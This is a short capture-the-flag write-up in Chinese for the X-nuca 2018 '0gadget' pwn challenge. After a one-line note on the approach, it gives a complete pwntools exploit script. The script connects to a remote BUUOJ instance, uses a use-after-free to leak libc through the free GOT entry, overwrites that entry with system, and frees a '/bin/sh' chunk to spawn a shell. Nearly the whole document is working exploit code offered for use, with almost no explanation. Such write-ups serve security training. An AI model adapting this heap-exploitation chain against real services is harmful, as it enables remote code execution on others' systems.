思路
在bss段上有构造uaf然后劫持got表即可
exp:
#!/usr/bin/python2
from pwn import *
def pwn():
#p=process('./X-nuca_2018_0gadget')
p=remote('node3.buuoj.cn',27565)
elf=ELF('./X-nuca_2018_0gadget')
libc=elf.libc
sda=lambda data,data1:p.sendafter('%s'%(data),data1)
sla=lambda data,data1:p.sendlineafter('%s'%(data),data1)
def add(size,title,data,mask):
sla(': ','1')
sla(': ',str(size))
sla(': ',title)
sda(': ',data)
sla(': ',mask)
def delete(idx,mask):
sla(': ','2')
sla(': ',str(idx))
sla(': ',mask)
def show(idx,mask):
sla(': ','3')
sla(': ',str(idx))
sla(': ',mask)
add(0x90,'a'*0x9,'doudou1','xixixi')
add(0x98,'b'*8,'dd','hahaha')
add(0x68,'c'*0x90,'cc','binbin')
delete(1,'lll')
delete(2,'ccc')
add(0x98,'doudou',p64(0x602178),'123123')
add(0x98,'doudou1','dd','kkkk')
add(0x98,'aaa',p64(elf.got['free']),'jjjjj')
show(0,'123')
libcbase=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-libc.sym['free']
system=libcbase+libc.sym['system']
add(0xe8,'d','tttt','mmmm')
add(0x38,'f','ffff','nnnn')
add(0x48,'v'*0x90,'vvvv','vvvv')
add(0x48,'b','/bin/sh\x00','bbbb')
delete(5,'555')
delete(6,'666')
add(0x38,'1',p64(elf.got['free']),'555')
add(0x38,'2','doudou','3333')
add(0x38,'3',p64(system),'2222')
log.success('libcbase: '+hex(libcbase))
delete(7,'111')
p.interactive()
if __name__=="__main__":
pwn()